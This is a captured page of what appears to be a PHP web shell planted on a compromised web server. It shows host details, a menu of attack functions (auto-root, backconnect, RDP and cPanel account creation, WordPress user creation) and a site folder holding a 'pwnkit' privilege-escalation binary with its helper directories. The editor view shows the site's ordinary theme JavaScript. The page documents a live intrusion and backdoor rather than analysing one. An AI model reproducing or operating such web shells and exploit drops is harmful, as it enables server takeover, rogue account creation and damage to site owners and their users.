Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.222.108.185
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
victoria roses /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
mega-menu
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
bootstrap.min.js
47.76
KB
-rw-r--r--
custom.js
6.54
KB
-rw-r--r--
jquery.min.js
83.57
KB
-rw-r--r--
popper.min.js
18.75
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : custom.js
var POTENZA = {}; (function($){ "use strict"; /* Predefined Variables */ var $window = $(window), $document = $(document), $body = $('body'), $countdownTimer = $('.countdown'), $textrotate = $('.textrotate'), $bar = $('.bar'), $progressBar = $('.skill-bar'), $fullScreen = $('.fullscreen') || $('.section-fullscreen'), $halfScreen = $('.halfscreen'), $counter = $('.counter'); /* Check if function exists */ $.fn.exists = function () { return this.length > 0; }; /* Mega menu */ POTENZA.megaMenu = function () { $('#menu').megaMenu({ // DESKTOP MODE SETTINGS logo_align : 'left', // align the logo left or right. options (left) or (right) links_align : 'left', // align the links left or right. options (left) or (right) socialBar_align : 'left', // align the socialBar left or right. options (left) or (right) searchBar_align : 'right', // align the search bar left or right. options (left) or (right) trigger : 'hover', // show drop down using click or hover. options (hover) or (click) effect : 'fade', // drop down effects. options (fade), (scale), (expand-top), (expand-bottom), (expand-left), (expand-right) effect_speed : 400, // drop down show speed in milliseconds sibling : true, // hide the others showing drop downs if this option true. this option works on if the trigger option is "click". options (true) or (false) outside_click_close : true, // hide the showing drop downs when user click outside the menu. this option works if the trigger option is "click". options (true) or (false) top_fixed : false, // fixed the menu top of the screen. options (true) or (false) sticky_header : true, // menu fixed on top when scroll down down. options (true) or (false) sticky_header_height: 250, // sticky header height top of the screen. activate sticky header when meet the height. option change the height in px value. menu_position : 'horizontal', // change the menu position. options (horizontal), (vertical-left) or (vertical-right) full_width : false, // make menu full width. options (true) or (false) // MOBILE MODE SETTINGS mobile_settings : { collapse : true, // collapse the menu on click. options (true) or (false) sibling : true, // hide the others showing drop downs when click on current drop down. options (true) or (false) scrollBar : true, // enable the scroll bar. options (true) or (false) scrollBar_height : 400, // scroll bar height in px value. this option works if the scrollBar option true. top_fixed : false, // fixed menu top of the screen. options (true) or (false) sticky_header : false, // menu fixed on top when scroll down down. options (true) or (false) sticky_header_height: 200 // sticky header height top of the screen. activate sticky header when meet the height. option change the height in px value. } }); } /* Isotope */ POTENZA.Isotope = function () { var $isotope = $(".isotope"), $itemElement = '.grid-item', $filters = $('.isotope-filters'); if ($isotope.exists()) { $isotope.isotope({ resizable: true, itemSelector: $itemElement, masonry: { gutterWidth: 10 } }); $filters.on( 'click', 'button', function() { var $val = $(this).attr('data-filter'); $isotope.isotope({ filter: $val }); $filters.find('.active').removeClass('active'); $(this).addClass('active'); }); } } /************************* Parallax *************************/ POTENZA.Parallax = function () { var $parallaxdiv = $('.parallax'), parallax = document.querySelectorAll(".parallax"),speed = 0.5; if ($parallaxdiv.exists()) { window.onscroll = function(){ [].slice.call(parallax).forEach(function(el,i){ var windowYOffset = window.pageYOffset, elBackgrounPos = "0 " + (windowYOffset * speed) + "px"; el.style.backgroundPosition = elBackgrounPos; }); }; } } /* Back to top */ POTENZA.goToTop = function () { var $goToTop = $('#back-to-top'); $goToTop.hide(); $window.scroll(function(){ if ($window.scrollTop()>100) $goToTop.fadeIn(); else $goToTop.fadeOut(); }); $goToTop.on("click", function () { $('body,html').animate({scrollTop:0},1000); return false; }); } /** FullScreen **/ POTENZA.screenSizeControl = function () { if ($fullScreen.exists()) { $fullScreen.each(function () { var $elem = $(this), elemHeight = $window.height(); if($window.width() < 768 ) $elem.css('height', elemHeight/ 1.1); else $elem.css('height', elemHeight); }); } if ($halfScreen.exists()) { $halfScreen.each(function () { var $elem = $(this), elemHeight = $window.height(); $elem.css('height', elemHeight / 1.5); }); } }; /**************************************************** POTENZA Window load and functions ****************************************************/ //Window load functions $window.load(function () { POTENZA.Isotope(); }); //Document ready functions $document.ready(function () { POTENZA.megaMenu(), POTENZA.Parallax(), POTENZA.goToTop(), POTENZA.screenSizeControl(); }); $window.resize(function() { POTENZA.screenSizeControl(); }); })(jQuery); var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.tawk.to/5efae8734a7c6258179b96fe/default'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();
Close